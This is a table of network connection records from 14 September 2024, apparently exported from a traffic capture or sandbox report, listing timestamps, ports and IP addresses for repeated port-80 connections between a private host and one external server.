Sep 14, 2024 12:53:43.717722893 CEST	80	62802	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:43.717833042 CEST	80	62802	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:43.837371111 CEST	62803	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:43.842685938 CEST	80	62803	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:44.051898956 CEST	80	62802	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:44.108508110 CEST	62802	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:44.181045055 CEST	80	62803	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:44.187567949 CEST	80	62802	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:44.227973938 CEST	62802	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:44.312381029 CEST	80	62803	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:44.312454939 CEST	62803	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:44.441677094 CEST	62802	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:44.441725969 CEST	62803	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:44.442367077 CEST	62804	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:44.447196960 CEST	80	62802	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:44.447274923 CEST	62802	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:44.447407961 CEST	80	62804	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:44.447469950 CEST	62804	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:44.447488070 CEST	80	62803	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:44.447535992 CEST	62803	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:44.447617054 CEST	62804	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:44.452450991 CEST	80	62804	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:44.807044983 CEST	62804	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:44.812083006 CEST	80	62804	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:45.131305933 CEST	80	62804	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:45.181099892 CEST	62804	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:45.264112949 CEST	80	62804	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:45.306083918 CEST	62804	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:45.387048006 CEST	62804	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:45.387770891 CEST	62805	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:45.392407894 CEST	80	62804	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:45.392488003 CEST	62804	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:45.392610073 CEST	80	62805	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:45.392791986 CEST	62805	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:45.392992020 CEST	62805	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:45.397737026 CEST	80	62805	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:45.743783951 CEST	62805	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:45.748776913 CEST	80	62805	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:46.057602882 CEST	80	62805	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:46.188416958 CEST	80	62805	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:46.188502073 CEST	62805	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:46.309693098 CEST	62805	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:46.310352087 CEST	62806	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:46.314891100 CEST	80	62805	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:46.314994097 CEST	62805	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:46.315207958 CEST	80	62806	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:46.315287113 CEST	62806	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:46.315531015 CEST	62806	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:46.320400000 CEST	80	62806	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:46.665599108 CEST	62806	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:46.670664072 CEST	80	62806	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:46.988356113 CEST	80	62806	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:47.118244886 CEST	80	62806	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:47.118407965 CEST	62806	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:47.254777908 CEST	62806	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:47.256243944 CEST	62807	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:47.261851072 CEST	80	62806	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:47.261944056 CEST	62806	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:47.263006926 CEST	80	62807	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:47.263092041 CEST	62807	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:47.263241053 CEST	62807	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:47.270178080 CEST	80	62807	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:47.618690014 CEST	62807	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:47.624810934 CEST	80	62807	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:47.931679010 CEST	80	62807	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:47.977974892 CEST	62807	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:48.064486027 CEST	80	62807	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:48.118655920 CEST	62807	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:48.188079119 CEST	62807	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:48.188921928 CEST	62808	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:48.193232059 CEST	80	62807	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:48.193413019 CEST	62807	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:48.193833113 CEST	80	62808	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:48.193917990 CEST	62808	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:48.194093943 CEST	62808	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:48.198908091 CEST	80	62808	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:48.543890953 CEST	62808	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:48.548741102 CEST	80	62808	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:48.885278940 CEST	80	62808	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:49.009263039 CEST	62808	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:49.077507973 CEST	80	62808	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:49.197562933 CEST	62808	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:49.197968006 CEST	62809	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:49.202725887 CEST	80	62808	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:49.202843904 CEST	62808	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:49.202894926 CEST	80	62809	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:49.202966928 CEST	62810	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:49.202966928 CEST	62809	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:49.203115940 CEST	62809	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:49.207844973 CEST	80	62810	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:49.207916975 CEST	62810	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:49.207984924 CEST	80	62809	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:49.208008051 CEST	62810	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:49.212836981 CEST	80	62810	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:49.556190014 CEST	62810	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:49.556320906 CEST	62809	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:49.561048985 CEST	80	62810	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:49.561141968 CEST	80	62809	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:49.561223984 CEST	80	62809	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:49.873395920 CEST	80	62810	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:49.895952940 CEST	80	62809	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:49.915518045 CEST	62810	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:49.946748972 CEST	62809	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:50.199666977 CEST	80	62810	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:50.200714111 CEST	62809	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:50.200736046 CEST	80	62809	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:50.200824022 CEST	62809	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:50.214766026 CEST	80	62810	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:50.214867115 CEST	62810	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:50.329139948 CEST	62810	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:50.330466032 CEST	62811	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:50.337544918 CEST	80	62810	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:50.337609053 CEST	62810	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:50.337678909 CEST	80	62811	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:50.337750912 CEST	62811	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:50.337892056 CEST	62811	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:50.345561981 CEST	80	62811	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:50.696820974 CEST	62811	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:50.701725960 CEST	80	62811	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:51.026640892 CEST	80	62811	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:51.158409119 CEST	80	62811	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:51.158524990 CEST	62811	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:51.279103994 CEST	62812	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:51.283978939 CEST	80	62812	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:51.284188032 CEST	62812	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:51.284390926 CEST	62812	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:51.289182901 CEST	80	62812	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:51.634628057 CEST	62812	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:51.639748096 CEST	80	62812	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:52.171122074 CEST	80	62812	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:52.171145916 CEST	80	62812	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:52.171170950 CEST	80	62812	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:52.171216011 CEST	62812	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:52.171257973 CEST	62812	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:52.290847063 CEST	62811	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:52.295774937 CEST	62812	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:52.296593904 CEST	62813	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:52.300825119 CEST	80	62812	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:52.300895929 CEST	62812	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:52.301453114 CEST	80	62813	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:52.301538944 CEST	62813	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:52.301625967 CEST	62813	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:52.308851957 CEST	80	62813	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:52.649991989 CEST	62813	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:52.657416105 CEST	80	62813	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:52.967427015 CEST	80	62813	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:53.096456051 CEST	80	62813	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:53.096605062 CEST	62813	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:53.273689985 CEST	62813	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:53.274055958 CEST	62814	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:53.279037952 CEST	80	62813	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:53.279053926 CEST	80	62814	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:53.279134989 CEST	62813	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:53.279172897 CEST	62814	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:53.279352903 CEST	62814	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:53.284168959 CEST	80	62814	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:53.634370089 CEST	62814	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:53.639544010 CEST	80	62814	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:53.963699102 CEST	80	62814	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:54.011367083 CEST	62814	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:54.182795048 CEST	80	62814	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:54.182822943 CEST	80	62814	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:54.182889938 CEST	62814	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:54.308536053 CEST	62814	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:54.309309959 CEST	62815	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:54.413259029 CEST	80	62815	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:54.413350105 CEST	62815	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:54.413465977 CEST	80	62814	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:54.413539886 CEST	62814	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:54.413625956 CEST	62815	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:54.418570042 CEST	80	62815	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:54.759351969 CEST	62815	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:54.764410019 CEST	80	62815	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:55.086540937 CEST	80	62815	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:55.134417057 CEST	62815	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:55.213473082 CEST	62815	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:55.214629889 CEST	62816	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:55.345849991 CEST	62817	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:55.359038115 CEST	80	62815	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:55.359080076 CEST	80	62815	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:55.359106064 CEST	62815	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:55.359138012 CEST	62815	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:55.359813929 CEST	80	62816	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:55.359874010 CEST	80	62817	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:55.359890938 CEST	62816	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:55.359914064 CEST	80	62815	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:55.359946012 CEST	62817	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:55.359961987 CEST	62815	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:55.360035896 CEST	62816	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:55.360222101 CEST	62817	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:55.366856098 CEST	80	62816	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:55.366884947 CEST	80	62817	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:55.712485075 CEST	62817	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:55.712558031 CEST	62816	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:55.717500925 CEST	80	62817	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:55.717566967 CEST	80	62816	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:55.717595100 CEST	80	62816	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:56.026160002 CEST	80	62817	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:56.044328928 CEST	80	62816	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:56.087364912 CEST	62816	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:56.152390003 CEST	80	62817	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:56.152477980 CEST	62817	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:56.241843939 CEST	80	62816	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:56.301373005 CEST	62816	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:56.301896095 CEST	62817	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:56.303116083 CEST	62818	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:56.307406902 CEST	80	62816	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:56.307476997 CEST	62816	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:56.307529926 CEST	80	62817	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:56.307581902 CEST	62817	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:56.307956934 CEST	80	62818	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:56.308027029 CEST	62818	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:56.308146954 CEST	62818	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:56.313204050 CEST	80	62818	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:56.665586948 CEST	62818	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:56.670551062 CEST	80	62818	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:57.002110958 CEST	80	62818	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:57.138061047 CEST	80	62818	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:57.138215065 CEST	62818	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:57.280564070 CEST	62819	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:57.285598993 CEST	80	62819	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:57.285696030 CEST	62819	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:57.285962105 CEST	62819	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:57.290740967 CEST	80	62819	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:57.634428024 CEST	62819	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:57.761209965 CEST	80	62819	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:57.962913036 CEST	80	62819	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:58.009246111 CEST	62819	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:58.150911093 CEST	80	62819	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:58.196755886 CEST	62819	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:58.279021978 CEST	62819	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:58.280184031 CEST	62820	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:58.284233093 CEST	80	62819	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:58.284306049 CEST	62819	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:58.285005093 CEST	80	62820	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:58.285070896 CEST	62820	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:58.285222054 CEST	62820	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:58.289987087 CEST	80	62820	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:58.634613991 CEST	62820	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:58.640610933 CEST	80	62820	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:58.978037119 CEST	80	62820	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:59.103022099 CEST	62820	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:59.114250898 CEST	80	62820	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:59.212383986 CEST	62820	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:59.432010889 CEST	62818	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:59.436327934 CEST	62820	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:59.437208891 CEST	62821	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:59.448615074 CEST	80	62821	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:59.448699951 CEST	62821	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:59.448843956 CEST	62821	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:59.448873997 CEST	80	62820	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:59.448930979 CEST	62820	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:59.453699112 CEST	80	62821	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:59.806260109 CEST	62821	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:59.811227083 CEST	80	62821	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:00.125212908 CEST	80	62821	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:00.165502071 CEST	62821	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:00.253166914 CEST	80	62821	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:00.306124926 CEST	62821	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:00.382685900 CEST	62821	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:00.383675098 CEST	62822	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:00.387851954 CEST	80	62821	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:00.387926102 CEST	62821	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:00.388608932 CEST	80	62822	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:00.388684988 CEST	62822	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:00.388796091 CEST	62822	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:00.393670082 CEST	80	62822	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:00.743928909 CEST	62822	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:00.748918056 CEST	80	62822	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:01.063442945 CEST	80	62822	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:01.118633032 CEST	62822	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:01.194641113 CEST	80	62822	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:01.243751049 CEST	62822	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:01.246010065 CEST	62823	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:01.250890970 CEST	80	62823	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:01.250952959 CEST	62823	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:01.251064062 CEST	62823	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:01.255999088 CEST	80	62823	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:01.325437069 CEST	62824	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:01.330358028 CEST	80	62824	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:01.330419064 CEST	62824	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:01.330517054 CEST	62824	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:01.335299015 CEST	80	62824	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:01.603207111 CEST	62823	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:01.681251049 CEST	62824	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:01.814187050 CEST	80	62823	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:01.814224958 CEST	80	62823	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:01.814425945 CEST	80	62824	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:01.930979967 CEST	80	62823	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:02.003211975 CEST	80	62824	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:02.056130886 CEST	62824	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:02.101443052 CEST	80	62823	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:02.101542950 CEST	62823	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:02.211747885 CEST	80	62824	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:02.259272099 CEST	62824	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:02.454170942 CEST	62822	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:02.454225063 CEST	62823	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:02.454272985 CEST	62824	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:02.454905033 CEST	62825	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:02.466687918 CEST	80	62825	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:02.466767073 CEST	62825	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:02.466883898 CEST	62825	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:02.469369888 CEST	80	62822	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:02.469402075 CEST	80	62823	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:02.469436884 CEST	62822	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:02.469469070 CEST	62823	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:02.469718933 CEST	80	62824	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:02.469765902 CEST	62824	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:02.473289013 CEST	80	62825	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:02.821909904 CEST	62825	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:02.826929092 CEST	80	62825	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:03.139471054 CEST	80	62825	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:03.212382078 CEST	62825	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:03.274552107 CEST	80	62825	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:03.398597002 CEST	62825	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:03.399811029 CEST	62826	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:03.403781891 CEST	80	62825	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:03.403835058 CEST	62825	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:03.404596090 CEST	80	62826	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:03.404664993 CEST	62826	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:03.404781103 CEST	62826	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:03.409708977 CEST	80	62826	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:03.759346962 CEST	62826	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:03.764365911 CEST	80	62826	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:04.097634077 CEST	80	62826	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:04.212400913 CEST	62826	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:04.230067968 CEST	80	62826	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:04.350753069 CEST	62826	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:04.351279974 CEST	62827	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:04.357628107 CEST	80	62826	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:04.357808113 CEST	62826	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:54:04.357888937 CEST	80	62827	80.211.144.156	192.168.2.4
Sep 14, 2024 12:54:04.357974052 CEST	62827	80	192.168.2.4	80.211.144.156
